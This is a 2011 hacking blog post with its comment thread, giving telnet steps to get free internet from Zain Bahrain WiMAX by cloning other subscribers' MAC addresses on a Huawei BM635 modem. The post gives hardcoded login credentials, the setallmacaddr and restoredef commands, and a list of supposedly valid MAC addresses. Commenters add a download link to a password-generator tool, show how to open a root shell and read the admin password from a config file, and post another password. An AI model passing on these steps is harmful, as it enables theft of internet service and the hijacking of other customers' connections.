Resetting.....

Upcoming fresh hacks

Non-Technical Hacks that works - Have Fun! (Status: in progress..)

Hacking network based biometric time-attendance system - Be your own boss! (Status: Done!)
Milestone Xprotect License Bypass hack - Replace a camera without license re-activation (Status: Done!)

Thursday, June 23, 2011

Zain Bahrain Wimax Hack: Free Internet with Huawei Echolife BM635

OK so you want FREE Internet


Screenshot (Telnet session)

  • Login to Huawei Echolife BM635 via telnet.
    telnet 192.168.1.1
  • Enter username / password and then press ENTER
    username: wimax
    password: wimax820
  • At ATP prompt
    type setallmacaddr XX:XX:XX:XX:XX:XX & then press ENTER (where XX:XX:XX:XX:XX:XX is a valid WAN MAC address)
    e.g. ATP> setallmacaddr 4C:54:99:12:12:12
  • Type restoredef & press ENTER
  • Huawei BM635 will restart with new MAC address and default configuration.
  • If done correctly then you will be connected to the Internet.

Note: Your WiFi & SIP settings will be lost.

Few valid MAC addresses:
4C:54:99:7A:23:94
4C:54:99:79:C8:59
4C:54:99:7A:1C:AA
4C:54:99:79:F5:9B
4C:54:99:7A:32:8B
4C:54:99:7A:44:A0
4C:54:99:79:FD:B4

more MACs later....


END!

65 comments:

knytwarrior said...

job well done rootshell

i have one click program if is ok to upload

btw pls inform people the valid mac vendor address

to avoid blank wan

Root Shell said...

Hi knytwarrior,

Thanks for your comment.

Of course if you want to share that will be great.

Well, regarding blank wan mac.. I did test one device having Blank Wan MAC, the wimax module was not responding at all (no serial output) and there was no eth1 interface. I need to do further tests regarding this issue.

What you said will work only if the wimax module is booting and responding to commands.

Thanks anyways

knytwarrior said...
This comment has been removed by the author.
knytwarrior said...

@root shell heres my promise

bm635 admin password generator and mac changer

for all windows 7 user make sure enable ur telnet and run as admin

http://www.mediafire.com/?dugfhgljbp71yy3


dont forget to thanks to root shell

password = clue is = author of this blog got it

knytwarrior said...
This comment has been removed by the author.
knytwarrior said...

for blank wan ive alredy tested we need to upload the firmware on the cpe can u tell me how to dump the firmware of st m29 flash kindly email me thanks in advance

Root Shell said...

Well, thanks knytwarrior

Admin pass generator will not work with Zain's Huaewi BM635 device as the password is hardcoded.

I have the dump of flash ST M29 but it doesn't contain wimax code.

Wimax flash is different.

Right now, I am busy with my homework so I don't have time to spare. Will check later!!

tRilobites said...
This comment has been removed by the author.
tRilobites said...

The same command in BM622 wimax but that command is not working in BM622i.

knytwarrior said...

blog halted

knytwarrior said...

ill post if root shell permited

give respect and you will gain a respect too...


Bettawfeeq !!! rootshell

tRilobites said...

Whew, It seems rootshell is so busy.
@knytwarrior did you read my comments on one of root shell article?
Can you post the list of your wimax firmware collection.

I'm looking for some, maybe you got one what i need.

knytwarrior said...

try to dump and put back to your cpe

Root Shell said...

@knytwarrior

I tried to update mac address with other vendor code like 00:23:F8, it worked.. no blank wan!

knytwarrior said...
This comment has been removed by the author.
knytwarrior said...
This comment has been removed by the author.
knytwarrior said...

where the private blog @rootshell

tRilobites said...

root shell can you invite me on your private blog?
Thanks in advance.

knytwarrior said...

test post only

knytwarrior said...

im wonderin why i cant post long details is there anything wrong

tRilobites said...

Maybe there is a word length restriction.

tRilobites said...

Any updates?

knytwarrior said...

no updates yet busy for homework you know were graduating students many home works now

ali said...
This comment has been removed by the author.
ali said...

you discovered
good luck bro

zarlwilliam said...

how do i write a mac address from another vendor to this modem? i am from USA and its hard to find hardware that lets you edit wimax mac this easily :)

Ralph said...

master rootshell...how about the lan problem with Huawei BM622. Can you solve the issue about that? The problem here was the pc will not detect anymore the modem. This problem occured after I uploaded an invalid config file of my modem. I experimented to edit the config file for security purposes but unfortunately my modem died.

Johnace_87 said...

sir good job thats great i need firmware of bm622 and bm622i will u pls send me these firmware my add is johnace_87@yahoo.com tnx

UltraGM said...

Hello Guy pls i need the procedure on how to Download Firmware for CPE BM635

George said...

hi newbie here how can you tell the diff between a blank wan and damaged firmware? my bm622 is not powering up but lan is blinking.

Root Shell said...

@George

You need to check the serial output to find it out.

rm said...

password generator doen't work on firmware vers. V100R001ITAC14B511. any clue?

Ahmad Sabry EL gendi said...

Hello Man sounds hard to reach you :)
I have Zain BM635 , All what I need is to have root access as my user as you know restricted.

is there is a way to export configuration and save it first then reset the device to be able to configure it manually again ?

Appreciate your advice

Ahmad Sabry EL gendi said...

Alhamdulillah means Thanks to Allah in Arabic :)

Rootshell your blog was very helpful to get the telnet access.

I managed to get the admin password :D

after telnet or ssh logging as rootshell said
user: wimax
password: wimax820

just write shell

ATP>shell
# cd /etc/
# ls
t_tree.xml psk.txt init.d dhcps.leases
sysmsg profile helpUser.pdf dhcps.conf
services pppmsg handy_rsa_key defaultcfg.xml
serverkey.pem passwd handy_dss_key countrysettings
servercert.pem mdev.conf group bootfile.txt
root.pem ipsec.conf gateway.conf VINETIC_FW
resolv.conf inittab ethertypes
racoon.conf initbun dhcps2.leases
# cat defaultcfg.xml


then you will find the admin password.

Thanks to Allah once more

casshern said...

sir rootshell... can you please help me on my bm622 wimax cpe i came to the part that i changed my mac address and suddenl after reboot.. i cant access telnet and GUI. please help!

1819rs said...

sir i want to change my WiFi password. i use zain home broadband internet plz help me and send me right sol lotion my Email
saqlainanjum1@gmail.com

yessaye said...

hi rootshell i got inspired by your post and i tried the trick on echolife-bm626 but I can get connected. is there anything u can suggest me to do. thank you

Harry said...

hi, can you teach us how to change the mac address of huawei bm622i?

thanks

Sirtheblack said...

Hi,i have a modem USB WIMAX BM 328 and i want to crack it!
Please can you help me thank!
My email: bado92@hotmail.fr

maurizio said...
This comment has been removed by the author.
maurizio said...

Hello, I have a bm635 Linkem, how to make free internet? with telnet?, Few have valid MAC addresses?, I live in the Italian, thanks in advance.
e-mail: maurizio_manna1963@libero.it

maurizio said...

sorry, you have the admin password for HES-319m OF HUAWEI LINKEM,
GUEST is limited by access, thanks

navs said...

hi, does anyone here have a firmware for bm652 please send me one at my email m_a_h_e_r_y@yahoo.fr

Mohammed Engaiz said...

hi, does anyone here have a firmware for bm635 please send me one at my email moh5757602@yahoo.com

rabarison rija said...

Hello everyone!Right after using the wimax scavenger scraper i instantly got blank wan and i've never been able to get my box working again...so could you guys give me some useful advice or tips about how to get the original firmware back or at least retrieve the three working huawei wimax BM 652 certificates.THANKS IN ADVANCE.I NEED YOUR HELP.I'M FROM MADAGASCAR and we're using the BM652 wimax model.Please email me at illuminatorfreemann@gmail.com

ammar almutawa said...

hi i need the bm635 firmware can some one send it too me at my email thank you
almutawa.ammar@hotmail.com

James Villegas said...

any update on bm622 blank wan issue?

kheno totozz said...

any one know how can i find telnet password ?

After telnet i saw ATP Cli , wimax and wimax820 not work .

Thanks .

Murtadha Alaali said...

iwant a passwors of anew wimax

charity said...

user
0SlO051O

Roy said...

may i ask what is the frequency of bm635? i saw a page that says its 3.5GHz frequency. if that's the case it won't work for isp with frequencies ranging from 2.4-2.6GHz frequencies on scanset. is this true?

MAJBOR said...

This password does not work

username: wimax
password: wimax820

MAJBOR said...

Hello rootshell

Experimented explanation did not succeed

This is a picture before the experiment

http://up.dev-point.com/uploads/24be27abff521.jpg

These pictures after the experiment

http://up.dev-point.com/uploads/1fbcdf7977042.jpg

http://up.dev-point.com/uploads/d4e135d9c58d3.jpg

Is there a solution?

bads said...

Solution for bm622 is to reflash the wan ic..

Osama Aqeel said...
This comment has been removed by the author.
Osama Aqeel said...
This comment has been removed by the author.
Osama Aqeel said...
This comment has been removed by the author.
Osama Aqeel said...

add me please

doorsbhn@gmail.com

mine BM635 tried all mac addresses but still not connected

Osama Aqeel said...

add me please

doorsbhn@gmail.com

mine BM635 tried all mac addresses but still not connected

Osama Aqeel said...

Now I have empty WAN number :(

help!!!

Dimba KONATE said...

Please help me. I want to change my bm652w mac address. I tried the command setallmacaddr but I get the following message :command failed. Can someone explain to me how to proceed to change bm652w mac address? Thank.

Kempee Ilagan said...

Hi admin

help me,what is the password this one

===bm635 admin password generator and mac changer=====

http://www.mediafire.com/download/dugfhgljbp71yy3/bm635hack.zip

please help me,,i need me tool

mjs home said...

Hi admin

help me


I have Zain router BM635 I did changed the MAc address.. and still no signal did I miss to do some thing.. more?

plz send me the way to make is work plz

hamood naser said...

hi ineed pass Huawei BM635 rar

Unknown said...

Hi ineed someone help me how to hack router zain pls add me
yoooousif1@gmail.com

Post a Comment